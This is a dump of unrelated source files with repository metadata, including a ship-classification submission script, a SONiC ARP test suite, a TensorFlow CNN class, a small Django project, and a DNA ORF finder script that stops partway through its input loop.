test_pro['pro_3'] = test_pred_prob[:,2]
# Hard-assign the 900 ships most confident in class 0 to class 0
# (leaderboard class-prior adjustment).
pred_pro = merge(test_pro[['pro_1', 'pro_2', 'pro_3']].values, 900,0)
test_pred = pred_pro.argmax(axis=1)
test_data = test_label[['ship']]
test_data["label"] = test_pred
# Decode back to the Chinese class names required by the submission format.
test_data["label"] = test_data["label"].map({0:'围网',1:'刺网',2:'拖网'})
# test_data['label'][:100] = '刺网'
test_data[["ship", "label"]].to_csv("result.csv", index=False, header=None)
print(test_data["label"].value_counts())
print('runtime:', time.time() - start_t)
|
[
"noreply@github.com"
] |
Ai-Light.noreply@github.com
|
c5e15319375d53d408d835b740d2eddf5d4338d0
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03943/s886039184.py
|
47e4a54633be998205df0d5ac0a15eb3b2b0a5f8
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 176
|
py
|
import sys
def LI():
    """Read one whitespace-separated line of integers from stdin."""
    line = sys.stdin.readline()
    return [int(token) for token in line.split()]
A = LI()  # three stick lengths
A.sort()
# After sorting, the two shorter sticks can exactly make up the longest
# iff their sum equals it.
if A[0]+A[1] == A[2]:
    print('Yes')
else:
    print('No')
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
eba509e44d06b1eb0943933b603132d04b06598a
|
acd7c5edd5e56e813d5c54c1aa1f894126fdbd01
|
/URLStatusChecker/asgi.py
|
da15c6d089184e3b55a141fd2b6ce1add8246345
|
[] |
no_license
|
Iron-Cow/URL-Status-Checker
|
1c8814bf057eb5bb9f3e31e812ef238267bcc997
|
b3ef5084b817768acf51dcfaeac1432d758a76d9
|
refs/heads/master
| 2022-04-17T01:10:17.581087
| 2020-04-11T18:18:28
| 2020-04-11T18:18:28
| 254,927,537
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 409
|
py
|
"""
ASGI config for URLStatusChecker project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
# Fall back to the project settings module unless the environment overrides it.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'URLStatusChecker.settings')
# Module-level ASGI callable picked up by the ASGI server.
application = get_asgi_application()
|
[
"uangeji@gmail.com"
] |
uangeji@gmail.com
|
b793faa9165095235e90f66c5a02acc7c6138f08
|
65b421d994a14d26ed906d35d563d4de010ec99e
|
/game/factories/__init__.py
|
014e7b8f9404a38846c12df7c7bec09b72be95b2
|
[] |
no_license
|
ManickYoj/Ludus
|
a7c4b7371cb6b8b459ade950c50c5ec3f4d3b056
|
6b57f787aaa8bd72044e6632d28acfed1c4a1903
|
refs/heads/master
| 2021-01-01T20:21:40.484854
| 2017-08-27T05:37:14
| 2017-08-27T05:37:14
| 98,823,596
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 582
|
py
|
"""
Factory Loader
This gnarly script walks through the factory directory and
loads each factory into the factory module namespace so that we
can eg. `from factory import PlayerFactory` rather than the more
verbose `from factory.player import PlayerFactory`.
"""
import importlib
import inspect
import pkgutil

__all__ = []

# Import every sibling module of this package and re-export its public
# names, so `from factories import PlayerFactory` works regardless of
# which file defines the factory.
for _loader, _mod_name, _is_pkg in pkgutil.walk_packages(__path__):
    # Bug fix: loader.find_module(name).load_module(name) was deprecated in
    # Python 3.4 and removed in 3.12; importlib.import_module is the
    # supported equivalent (and registers the module under its full name).
    module = importlib.import_module('{}.{}'.format(__name__, _mod_name))
    for attr_name, attr_value in inspect.getmembers(module):
        # Skip private and dunder names.
        if attr_name.startswith(('__', '_')):
            continue
        globals()[attr_name] = attr_value
        __all__.append(attr_name)
|
[
"nickfrancisci@gmail.com"
] |
nickfrancisci@gmail.com
|
1f03e2319d271e48b8e3dfebfaa31c9bf70a2cfd
|
be7f74cb434d1e1de9fb4c9417fec473db101844
|
/lecturer/admin.py
|
a65de3345090043f9d2c7b0b42e74860276da569
|
[] |
no_license
|
belloshehu/academics
|
acd1bb690376debdc4309a12d5195f2e34713361
|
aff02861204cfa4580a59dc11a8d28154216710e
|
refs/heads/master
| 2023-07-20T13:55:53.588174
| 2021-08-22T10:02:11
| 2021-08-22T10:02:11
| 326,049,728
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 93
|
py
|
from django.contrib import admin
from .models import Lecturer
# Make Lecturer manageable through the Django admin with default options.
admin.site.register(Lecturer)
|
[
"belloshehu1@gmail.com"
] |
belloshehu1@gmail.com
|
42b078cdb0424dff4b849e9f742b188755830fbb
|
8e0b9b63771dfc0e9dcef35d86da5c750f1d1dc6
|
/tests/arp/test_arpall.py
|
bc67c2f500872517725f37628243628e428c8b21
|
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
status110/sonic-mgmt
|
95f73502c602902c01c985f0639a2dcad2826d03
|
ffb090240cfbffdaa2079ee8d5a564902e21858a
|
refs/heads/master
| 2023-01-13T10:12:52.177961
| 2020-11-12T04:18:38
| 2020-11-12T04:18:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,099
|
py
|
import logging
import pytest
import time
from datetime import datetime
from tests.ptf_runner import ptf_runner
from tests.common.helpers.assertions import pytest_assert
from tests.common import config_reload
# Restrict this module to t1 topologies.
pytestmark = [
    pytest.mark.topology('t1')
]
logger = logging.getLogger(__name__)
def collect_info(duthost):
    """Dump interface and address state from the DUT for debugging.

    Only runs on Mellanox ASICs; a no-op everywhere else.
    """
    if duthost.facts['asic_type'] != "mellanox":
        return
    logger.info('************* Collect information for debug *************')
    duthost.shell('ip link')
    duthost.shell('ip addr')
    # The grep probes may legitimately fail when no matching netdevs exist.
    duthost.shell('grep . /sys/class/net/Ethernet*/address', module_ignore_errors=True)
    duthost.shell('grep . /sys/class/net/PortChannel*/address', module_ignore_errors=True)
@pytest.fixture(scope="module")
def common_setup_teardown(duthost, ptfhost):
    """Prepare two DUT test ports with known IPs; restore config afterwards.

    Picks the two lowest-numbered minigraph ports, removes them from any
    port-channel they belong to, assigns the test addresses 10.10.1.2/28
    and 10.10.1.20/28, and copies the PTF test scripts to the PTF host.
    Yields (duthost, ptfhost, int_facts, intf1, intf2, intf1_indice,
    intf2_indice).  The DUT config is reloaded on teardown regardless of
    test outcome.
    """
    mg_facts = duthost.minigraph_facts(host=duthost.hostname)['ansible_facts']
    int_facts = duthost.interface_facts()['ansible_facts']
    # Sort ports numerically (EthernetN) so the selection is deterministic.
    ports = list(sorted(mg_facts['minigraph_ports'].keys(), key=lambda item: int(item.replace('Ethernet', ''))))
    # Select port index 0 & 1 two interfaces for testing
    intf1 = ports[0]
    intf2 = ports[1]
    logger.info("Selected ints are {0} and {1}".format(intf1, intf2))
    intf1_indice = mg_facts['minigraph_port_indices'][intf1]
    intf2_indice = mg_facts['minigraph_port_indices'][intf2]
    # NOTE(review): get_po is defined elsewhere in this module; presumably
    # returns the port-channel name the interface belongs to, or None.
    po1 = get_po(mg_facts, intf1)
    po2 = get_po(mg_facts, intf2)
    try:
        # Make sure selected interfaces are not in portchannel
        if po1 is not None:
            duthost.shell('config portchannel member del {0} {1}'.format(po1, intf1))
            collect_info(duthost)
            duthost.shell('config interface startup {0}'.format(intf1))
            collect_info(duthost)
        if po2 is not None:
            duthost.shell('config portchannel member del {0} {1}'.format(po2, intf2))
            collect_info(duthost)
            duthost.shell('config interface startup {0}'.format(intf2))
            collect_info(duthost)
        # Change SONiC DUT interface IP to test IP address
        duthost.shell('config interface ip add {0} 10.10.1.2/28'.format(intf1))
        collect_info(duthost)
        duthost.shell('config interface ip add {0} 10.10.1.20/28'.format(intf2))
        collect_info(duthost)
        if (po1 is not None) or (po2 is not None):
            # Give interfaces time to settle after LAG membership changes.
            time.sleep(40)
        # Copy test files
        ptfhost.copy(src="ptftests", dest="/root")
        yield duthost, ptfhost, int_facts, intf1, intf2, intf1_indice, intf2_indice
    finally:
        # Recover DUT interface IP address
        config_reload(duthost, config_source='config_db', wait=120)
def test_arp_unicast_reply(common_setup_teardown):
    """DUT must answer a well-formed unicast ARP request and learn the sender."""
    duthost, ptfhost, int_facts, intf1, intf2, intf1_indice, intf2_indice = common_setup_teardown
    # Start from an empty ARP table so the learned entry is unambiguous.
    clear_dut_arp_cache(duthost)
    params = {
        'acs_mac': int_facts['ansible_interface_facts'][intf1]['macaddress'],
        'port': intf1_indice,
    }
    stamp = datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
    ptf_runner(ptfhost, 'ptftests', "arptest.VerifyUnicastARPReply", '/root/ptftests',
               params=params,
               log_file="/tmp/arptest.VerifyUnicastARPReply.{0}.log".format(stamp))
    # The DUT should have learned the PTF neighbour on intf1.
    arp_entry = duthost.switch_arptable()['ansible_facts']['arptable']['v4']['10.10.1.3']
    pytest_assert(arp_entry['macaddress'] == '00:06:07:08:09:00')
    pytest_assert(arp_entry['interface'] == intf1)
def test_arp_expect_reply(common_setup_teardown):
    """DUT replies to a correct ARP request and installs the sender's entry."""
    duthost, ptfhost, int_facts, intf1, intf2, intf1_indice, intf2_indice = common_setup_teardown
    params = {
        'acs_mac': int_facts['ansible_interface_facts'][intf1]['macaddress'],
        'port': intf1_indice,
    }
    # Start PTF runner and send correct arp packets
    clear_dut_arp_cache(duthost)
    stamp = datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
    ptf_runner(ptfhost, 'ptftests', "arptest.ExpectReply", '/root/ptftests',
               params=params,
               log_file="/tmp/arptest.ExpectReply.{0}.log".format(stamp))
    arp_entry = duthost.switch_arptable()['ansible_facts']['arptable']['v4']['10.10.1.3']
    pytest_assert(arp_entry['macaddress'] == '00:06:07:08:09:0a')
    pytest_assert(arp_entry['interface'] == intf1)
def test_arp_no_reply_other_intf(common_setup_teardown):
    """The DUT must neither reply to nor learn from ARP requests arriving on the wrong interface."""
    duthost, ptfhost, int_facts, intf1, intf2, intf1_indice, intf2_indice = common_setup_teardown
    clear_dut_arp_cache(duthost)
    # Drive the request in via intf2 instead of the interface owning the subnet.
    intf2_params = {
        'acs_mac': int_facts['ansible_interface_facts'][intf2]['macaddress'],
        'port': intf2_indice
    }
    log_file = "/tmp/arptest.SrcOutRangeNoReply.{0}.log".format(datetime.now().strftime("%Y-%m-%d-%H:%M:%S"))
    ptf_runner(ptfhost, 'ptftests', "arptest.SrcOutRangeNoReply", '/root/ptftests', params=intf2_params, log_file=log_file)
    # No entry for the spoofed sender may appear in the ARP table.
    arp_table = duthost.switch_arptable()['ansible_facts']
    for neighbor_ip in arp_table['arptable']['v4'].keys():
        pytest_assert(neighbor_ip != '10.10.1.4')
def test_arp_no_reply_src_out_range(common_setup_teardown):
    """The DUT must ignore ARP requests whose source IP is outside the interface subnet."""
    duthost, ptfhost, int_facts, intf1, intf2, intf1_indice, intf2_indice = common_setup_teardown
    ptf_params = {
        'acs_mac': int_facts['ansible_interface_facts'][intf1]['macaddress'],
        'port': intf1_indice
    }
    # Empty the cache first so a stale entry cannot mask a failure.
    clear_dut_arp_cache(duthost)
    log_file = "/tmp/arptest.SrcOutRangeNoReply.{0}.log".format(datetime.now().strftime("%Y-%m-%d-%H:%M:%S"))
    ptf_runner(ptfhost, 'ptftests', "arptest.SrcOutRangeNoReply", '/root/ptftests', params=ptf_params, log_file=log_file)
    # The out-of-range sender must not have been learned.
    arp_table = duthost.switch_arptable()['ansible_facts']
    for neighbor_ip in arp_table['arptable']['v4'].keys():
        pytest_assert(neighbor_ip != '10.10.1.22')
def test_arp_garp_no_update(common_setup_teardown):
    """Gratuitous ARP must not create new entries, but may refresh already-resolved ones."""
    duthost, ptfhost, int_facts, intf1, intf2, intf1_indice, intf2_indice = common_setup_teardown
    ptf_params = {
        'acs_mac': int_facts['ansible_interface_facts'][intf1]['macaddress'],
        'port': intf1_indice
    }
    # Phase 1: with an empty cache, a gratuitous ARP must install nothing.
    clear_dut_arp_cache(duthost)
    log_file = "/tmp/arptest.GarpNoUpdate.{0}.log".format(datetime.now().strftime("%Y-%m-%d-%H:%M:%S"))
    ptf_runner(ptfhost, 'ptftests', "arptest.GarpNoUpdate", '/root/ptftests', params=ptf_params, log_file=log_file)
    arp_table = duthost.switch_arptable()['ansible_facts']
    for neighbor_ip in arp_table['arptable']['v4'].keys():
        pytest_assert(neighbor_ip != '10.10.1.7')
    # Phase 2: resolve 10.10.1.3 normally via a regular ARP exchange.
    log_file = "/tmp/arptest.ExpectReply.{0}.log".format(datetime.now().strftime("%Y-%m-%d-%H:%M:%S"))
    ptf_runner(ptfhost, 'ptftests', "arptest.ExpectReply", '/root/ptftests', params=ptf_params, log_file=log_file)
    arp_table = duthost.switch_arptable()['ansible_facts']
    resolved = arp_table['arptable']['v4']['10.10.1.3']
    pytest_assert(resolved['macaddress'] == '00:06:07:08:09:0a')
    pytest_assert(resolved['interface'] == intf1)
    time.sleep(2)
    # Phase 3: a gratuitous ARP with a new MAC should now update that entry
    # (no reply expected, just a table refresh).
    log_file = "/tmp/arptest.GarpUpdate.{0}.log".format(datetime.now().strftime("%Y-%m-%d-%H:%M:%S"))
    ptf_runner(ptfhost, 'ptftests', "arptest.GarpUpdate", '/root/ptftests', params=ptf_params, log_file=log_file)
    arp_table = duthost.switch_arptable()['ansible_facts']
    refreshed = arp_table['arptable']['v4']['10.10.1.3']
    pytest_assert(refreshed['macaddress'] == '00:00:07:08:09:0a')
    pytest_assert(refreshed['interface'] == intf1)
def clear_dut_arp_cache(duthost):
    """Flush every neighbor/ARP entry on the DUT via iproute2."""
    flush_cmd = 'ip -stats neigh flush all'
    duthost.shell(flush_cmd)
def get_po(mg_facts, intf):
    """Return the name of the port channel that *intf* belongs to, or None.

    Args:
        mg_facts: minigraph facts dict; its 'minigraph_portchannels' entry maps
            port-channel name -> {'members': [interface names], ...}.
        intf: interface name to look up (e.g. 'Ethernet0').

    Returns:
        The port-channel name whose member list contains *intf*, or None when
        the interface is not a member of any port channel.
    """
    # Fix: the original used the Python-2-only dict.iteritems(); .items()
    # behaves identically here and works on both Python 2 and Python 3.
    for po_name, po_info in mg_facts['minigraph_portchannels'].items():
        if intf in po_info['members']:
            return po_name
    return None
|
[
"noreply@github.com"
] |
status110.noreply@github.com
|
707a213f89027967bfe6dc6de5d54cf13c27992e
|
8d0af4af7a9b746c7fb81ef800965437c1c6cf1c
|
/nets/ResCNN.py
|
3b95e1b8141645a681214fe4e007506300b6337d
|
[] |
no_license
|
1069066484/NInRow
|
abcee034b81d6f2526ab6b4fa99a8f7726fd805f
|
863902fbb47e507a6c7ebdebb19376ebc80daf8d
|
refs/heads/master
| 2022-08-26T13:46:55.211522
| 2022-08-03T02:21:17
| 2022-08-03T02:21:17
| 190,905,699
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,773
|
py
|
"""
@Author: Zhixin Ling
@Description: A general and flexible CNN model.
"""
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.python.ops import control_flow_ops
from tensorflow.python import debug as tf_debug
import numpy as np
from sklearn.metrics import *
from data_utils import *
from global_defs import *
from tensorflow.contrib.slim import nets
class CNN:
    """A general and flexible TF1/slim CNN classifier.

    The graph is an optional slim resnet_v2 backbone followed by the
    conv/pool/fully-connected stack described by ``CNN.Params``.  Key tensors
    are registered in tf collections under the names in ``self.var_names`` so
    that a graph reloaded from a saved meta file can be re-wired by name
    (see ``init_vars``).

    NOTE(review): this source arrived with all indentation stripped; block
    structure below was reconstructed from the code's semantics.  Confirm the
    ambiguous spots against the original repository (checkpoint placement in
    ``train``, scope of the arg_scope in ``construct_model``).
    """

    class Params:
        """
        cnns: a list with scalars(pooling layer) or two-element list(channels, kernel_size) as its element
        fcs: a list of scalars, indicating neurons of fully connected layers. Set fcs to None if you don't want the
        output flattened.
        """

        def __init__(self, cnns, fcs):
            self.cnns = cnns
            self.fcs = fcs

        def __str__(self):
            return '[cnn:' + str(self.cnns) + ' fcs:' + str(self.fcs) + ']'

        def construct(self, input, keep_prob=1.0, scope_prefix=""):
            # Translate the spec into slim layers: an int entry becomes a
            # square max-pool of that size, a [channels, kernel_size] pair
            # becomes a conv layer.
            conv_cnt = 1
            pool_cnt = 1
            net = input
            for param in self.cnns:
                if isinstance(param, int):
                    net = slim.max_pool2d(net, [param,param], scope=scope_prefix + 'pool' + str(pool_cnt))
                    pool_cnt += 1
                else:
                    net = slim.conv2d(net, param[0], [param[1],param[1]], scope=scope_prefix+'conv' + str(conv_cnt))
                    conv_cnt += 1
            # fcs is None means the caller wants the raw feature map back.
            if self.fcs is None:
                return net
            net = slim.flatten(net)
            for idx, param in enumerate(self.fcs):
                net = slim.fully_connected(net, param, scope=scope_prefix+'fc' + str(idx))
                net = slim.dropout(net, keep_prob=keep_prob)
            return net

    def __init__(self, cnn_params=Params([[16,5],2,[32,5],2], [1024]),
                 kp=0.5, lr_init=0.05, lr_dec_rate=0.95, batch_size=128,
                 epoch=10, verbose=False, act=tf.nn.relu, l2=5e-8, path=None,
                 resnet_v2=None):
        """
        built_net: a resnet_v2. Like nets.resnet_v2.resnet_v2_50.
        The input images first go through built_net and then the net constructed by CNN
        """
        self.params = cnn_params        # Params spec for the conv/fc stack (may be None)
        self.kp = kp                    # dropout keep probability used while training
        self.lr_init = lr_init          # initial learning rate for exponential decay
        self.lr_dec_rate = lr_dec_rate  # per-epoch learning-rate decay factor
        self.batch_size = batch_size
        self.epoch = epoch
        self.verbose = verbose          # print train/test accuracy once per epoch
        self.act = act                  # activation function for conv/fc layers
        self.l2 = l2                    # L2 weight-regularization strength
        # Checkpoint directory; mkdir presumably comes from the star imports
        # (data_utils / global_defs) — verify.
        self.path = None if path is None else mkdir(path)
        self.sess = None
        self.resnet_v2 = resnet_v2      # optional slim resnet_v2 backbone builder
        self.ts = {}                    # name -> tensor, filled by init_vars()
        self.var_names = ['kp', 'y', 'acc', 'is_train', 'pred', 'global_step', 'loss','x', 'train_step']

    def print_vars(self):
        # Debug helper: dump every global variable and every graph operation.
        # NOTE(review): ``self.graph`` is never assigned anywhere in this
        # class, so the op dump below would raise AttributeError — confirm.
        variable_names = tf.global_variables()
        for name in variable_names:
            print(name)
        op = self.graph.get_operations()
        for i in op:
            print(i)

    def init_vars(self):
        # Re-bind the named tensors from the (possibly reloaded) graph's
        # collections into self.ts for use by train/run_acc/predict.
        for ts in self.var_names:
            self.ts[ts] = tf.get_collection(ts)[0]

    def __str__(self):
        return "CNN-- structure: {} \tkp: {} \tlr_init: {} \tlr_dec_rate: {} \tbatch_size: {} \tepoch: {} \tact: {}".format(
            self.params, self.kp, self.lr_init, self.lr_dec_rate, self.batch_size, self.epoch, str(self.act).split(' ')[1] if self.act is not None else 'NONE')

    def init_training_data(self, X, Y, reserve_test):
        # Optionally split off a held-out test fraction, then one-hot encode
        # the labels (labeled_data_split / labels2one_hot come from the star
        # imports).
        self.Y_min = np.min(Y)
        if reserve_test is not None:
            xy_tr, xy_te = labeled_data_split([X, Y], 1.0-reserve_test)
            X, Y = xy_tr
            X_te, Y_te = xy_te
            self.X_te = X_te
            # NOTE(review): adding Y_min to the one-hot matrix looks suspect
            # (it is a no-op only when labels start at 0); presumably the
            # intent was to shift the labels before encoding — confirm.
            self.Y_te = labels2one_hot(Y_te) + self.Y_min
        else:
            self.X_te = None
            self.Y_te = None
        self.X = X
        self.Y = labels2one_hot(Y) + self.Y_min

    def fit(self, X, Y, reserve_test=None, refresh_saving=False):
        """
        If you wanna extract test set automatically, set reserve_test the ratio for test set
        """
        # Full training entry point: prepare data, build the graph, restore
        # or initialize a session, then run the training loop.
        self.init_training_data(X, Y, reserve_test)
        self.construct_model()
        self.init_sess(refresh_saving)
        self.train()

    def construct_model(self):
        # Build the whole TF1 graph: placeholders, backbone + conv/fc stack,
        # loss, decayed-LR Adam step, and the named-tensor collections.
        tf.reset_default_graph()
        n_xs, slen = self.X.shape
        # Inputs are flattened square images; recover the side length.
        slen = int(round(np.sqrt(slen)))
        n_labels = self.Y.shape[1]
        x = tf.placeholder(tf.float32, [None, slen*slen], name='x')
        x_trans = tf.reshape(x, [-1, slen, slen, 1])
        if self.resnet_v2 is not None:
            # resnet_v2 backbones expect 3-channel input.
            x_trans = tf.image.grayscale_to_rgb(x_trans)
        kp = tf.placeholder(tf.float32, [], name='kp')
        y = tf.placeholder(tf.float32, [None, n_labels], name='y')
        is_train = tf.placeholder(tf.bool, [], name='is_train')
        net = x_trans
        # Shared layer defaults: activation, batch norm, L2 regularization.
        with slim.arg_scope([slim.conv2d, slim.fully_connected],
                            activation_fn=self.act,
                            normalizer_fn=tf.layers.batch_normalization,
                            normalizer_params={'training': is_train, 'momentum': 0.95},
                            weights_regularizer=slim.l2_regularizer(self.l2)):
            if self.resnet_v2 is not None:
                net, _ = self.resnet_v2(
                    net, num_classes=None, is_training=is_train, global_pool=True)
            if self.params is not None:
                net = self.params.construct(net, kp)
            if len(net.shape) > 2:
                net = slim.flatten(net)
            logits = slim.fully_connected(net, n_labels, activation_fn=None, scope='logits')
        pred = tf.argmax(logits,1, name='pred')
        corrects = tf.equal(tf.argmax(logits,1),tf.argmax(y,1))
        acc = tf.reduce_mean(tf.cast(corrects, tf.float32),name='acc')
        cross_entropy = tf.reduce_mean(
            tf.nn.softmax_cross_entropy_with_logits_v2(labels=y, logits=logits))
        regularization_loss = tf.add_n(tf.losses.get_regularization_losses())
        loss = tf.add(cross_entropy, regularization_loss, name='loss')
        global_step = tf.get_variable("global_step", [], initializer=tf.constant_initializer(0.0), trainable=False)
        # Stair-cased decay: the LR drops once per epoch's worth of steps.
        lr = tf.train.exponential_decay(
            self.lr_init,
            global_step,
            n_xs / self.batch_size, self.lr_dec_rate,
            staircase=True)
        optimizer = tf.train.AdamOptimizer(learning_rate=lr)
        train_step = slim.learning.create_train_op(
            loss, optimizer, global_step=global_step)
        # Make batch-norm moving-average updates run with every train step.
        update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
        if update_ops:
            updates = tf.group(*update_ops)
            train_step = control_flow_ops.with_dependencies([updates], train_step)
        # Register every tensor listed in var_names so init_vars can find
        # them by name after a meta-graph reload.
        locs = locals()
        for var in self.var_names:
            tf.add_to_collection(var, locs[var])

    def next_batch(self):
        # Return the next (X, Y) training batch, wrapping around the data
        # set when the cursor runs past the end.
        batch_sz = self.batch_size
        indices = list(range(self.curr_tr_batch_idx, self.curr_tr_batch_idx+batch_sz))
        self.curr_tr_batch_idx = (batch_sz + self.curr_tr_batch_idx) % self.X.shape[0]
        indices = [i%self.X.shape[0] for i in indices]
        return [self.X[indices], self.Y[indices]]

    def run_acc(self, X, Y):
        # Batched accuracy over (X, Y); the last, possibly smaller batch is
        # weighted by its true size.
        correct_preds = 0.0
        for batch_idx in range(0,X.shape[0],self.batch_size):
            batch_idx_next = min(X.shape[0], batch_idx + self.batch_size)
            batch_xs = X[batch_idx:batch_idx_next]
            batch_ys = Y[batch_idx:batch_idx_next]
            acc = self.sess.run(self.ts['acc'],feed_dict=
                {self.ts['x']: batch_xs, self.ts['kp']: 1.0, self.ts['is_train']: False, self.ts['y']: batch_ys})
            #print(acc, acc * (batch_idx_next - batch_idx), X.shape)
            correct_preds += acc * (batch_idx_next - batch_idx)
        return correct_preds / X.shape[0]

    def init_sess(self, refresh_saving):
        """
        return whether use new parameters
        """
        # Reload the saved meta graph when one exists, otherwise create a
        # fresh Saver for the graph built by construct_model.
        if exists(join(self.path, '0.meta')):
            tf.reset_default_graph()
            sess = tf.Session()
            self.saver = tf.train.import_meta_graph(join(self.path, '0.meta'))
            print("Find the meta in file", self.path)
        else:
            print("Init new meta")
            self.saver = tf.train.Saver()
            sess = tf.Session()
        sess.run(tf.global_variables_initializer())
        self.init_vars()
        self.sess = sess
        # Try to restore the latest checkpoint unless a refresh was requested.
        if not refresh_saving and self.path is not None:
            try:
                self.saver.restore(sess,tf.train.latest_checkpoint(self.path))
                print("Find the lastest check point in file", self.path)
                return True
            except:
                # NOTE(review): bare except — any restore failure silently
                # falls back to freshly initialized parameters.
                print("Init new parameters")
        return False

    def train(self):
        # Main optimization loop: save the meta graph once up front, then
        # run epoch * n_samples / batch_size training steps.
        sess = self.sess
        self.saver.save(sess, join(self.path, '0'), write_meta_graph=True)
        self.curr_tr_batch_idx = 0
        # Steps per epoch, used to pace the verbose progress report.
        it_pep = round(self.X.shape[0] / self.batch_size)
        x_t = self.ts['x']; kp_t = self.ts['kp']; y_t = self.ts['y']; is_train_t = self.ts['is_train'];
        train_step_t = self.ts['train_step']; global_step_t = self.ts['global_step']
        for i in range(round(self.epoch * self.X.shape[0] / self.batch_size)+1):
            batch_xs, batch_ys = self.next_batch()
            feed_dict = {x_t: batch_xs, kp_t: self.kp, y_t: batch_ys, is_train_t: True}
            sess.run(train_step_t, feed_dict=feed_dict)
            global_step = sess.run(global_step_t, feed_dict=feed_dict)
            if self.verbose and global_step % it_pep == 0:
                print("iteration:",i,' global_step:',global_step, ' train_acc: ',self.run_acc(self.X, self.Y), ' test_acc:',
                    -1.0 if self.X_te is None else self.run_acc(self.X_te, self.Y_te))
            # NOTE(review): with the upstream indentation lost it is unclear
            # whether this checkpoint save ran per-step or only inside the
            # periodic block above; per-step is assumed here — confirm.
            if self.path is not None:
                self.saver.save(sess, self.path + '/model', global_step=global_step_t, write_meta_graph=False)

    def predict(self, X):
        # Lazily restore a session if needed, then return argmax class ids
        # for the flattened input images X.
        if self.sess is None:
            if not self.init_sess(False):
                raise Exception("Error: trying to predict without trained network")
        pred = self.sess.run(self.ts['pred'], feed_dict={self.ts['x']: X, self.ts['kp']: 1.0, self.ts['is_train']: False})
        return pred
def main_mnist():
    """Train the plain (no-resnet) CNN demo on a small MNIST subset."""
    data, labels = read_mnist_dl()
    # Keep only the first 5000 samples so the demo run stays quick.
    data = data[:5000]
    labels = labels[:5000]
    model = CNN(path='log_noresCNN', epoch=3, verbose=True, batch_size=4, resnet_v2=None)
    model.fit(data, labels, 0.2)
def main_mnist_res():
    """Train the resnet_v2_50-backed CNN demo on a small MNIST subset."""
    data, labels = read_mnist_dl()
    # Keep only the first 5000 samples so the demo run stays quick.
    subset_data = data[:5000]
    subset_labels = labels[:5000]
    model = CNN(path='log_resCNN', epoch=3, verbose=True, batch_size=4,
                resnet_v2=nets.resnet_v2.resnet_v2_50, cnn_params=None)
    model.fit(subset_data, subset_labels, 0.2)
if __name__ == "__main__":
    # Script entry point: runs the resnet-backed MNIST demo by default;
    # uncomment the line below to run the plain-CNN variant instead.
    # main_mnist()
    main_mnist_res()
|
[
"1069066484@qq.com"
] |
1069066484@qq.com
|
100a8d656e1a683ea0523ab5c362765c2fc4dabc
|
0de6c4d7492d69304e71887c50890f35a55acbf0
|
/ORF-0.99.py
|
2a28fe3fad3ecf550ded586c9f998b5ea98aad67
|
[] |
no_license
|
Omaramin81297/ORF-finder-translator
|
8539fc9ec883e8c2815f94deb94a7dee7ded23f9
|
4bb5e873f843dd6eb5f415f99c2c11dffed9f043
|
refs/heads/master
| 2020-09-21T06:15:49.936958
| 2019-11-28T18:57:07
| 2019-11-28T18:57:07
| 224,706,933
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 30,175
|
py
|
import re
# We print a welcome message, explaining the usage of this tool and its outcome and how do we choose from the choices given.
print('''Welcome to the ORF finder & DNA translator tool. this will help you find all possible open reading frames
and predicting their protein sequence.
The result of this program will be in a text file called completeframes which has all the info
about every single ORF in all frames.
It will also create 6 fasta files called orf_frame_n, n for each frame.
please choose any option you like by writing its number only. \n''')
# We make a while loop, in order to return to the start point if there's a user error. if there's none, the loop will be broken and the code is continued.
while True:
# Entering 1 will choose to input from file, 2 will choose to input from terminal
choice=input('''First, how would you like to enter your sequences?
1: Enter the sequences through a file
2: Enter them through the terminal
''')
# Make an error statement to show if the user didn't put anything
if choice=='':
print("\nError: You didn't choose an option!\n")
# Make an error statement to show if the user wrote something that isn't present in the choices above
elif choice not in ['1','2']:
print("\nError: Your entry isn't from the choices above!\n")
# If everything is fine, break the loop
else:
break
# A conditional where the file was chosen
if choice=='1':
# Another while loops for file error
while True:
while True:
# -fileo- is the name of the input file
fileo=input('\nInput file name with the extension: ')
# Error statement if the user skipped putting the file name
if fileo=='':
print("\nError: You didn't enter a file name!")
# If he wrote something:
else:
# We now try to see if this file exists or not, we test for python errors now
try:
fasta=open(fileo).read()
# If it doesn't exist, print this message
except IOError:
print('\nError: File not found in this directory!')
# If the file exists and everything is fine, break the loop and open the file
else:
break
# Using a pattern, we find all sequences with their names inside the file and put them in variable -name_with_seq-, and we create
# two empty lists called -names- and -sequences-
name_with_seq=re.findall(r'>.*\n[\w\n]*',fasta)
names=[]
sequences=[]
# We take every string in the list and split it by the first \n, that will split between the name and the sequence
for i in name_with_seq:
# -one_name- is the name of the sequence and -one_seq- is the sequence, we append the name to -names- and the sequence to -sequences-
one_name,one_seq=re.split(r'\n',i,1)
names.append(one_name)
sequences.append(one_seq)
# -errornum- is used to break the big while loop if all the sequences in -sequences- have no wrong characters or errors
errornum=0
for i in range(0,len(sequences)):
invalid=re.search(r'[^ATGCatgcnN\n\s]',sequences[i])
if invalid:
print('Error: ('+names[i]+') has invalid DNA sequence characters at location '+str(invalid.start()+1))
errornum+=1
# If nothing's wrong, break the loop
if errornum==0:
break
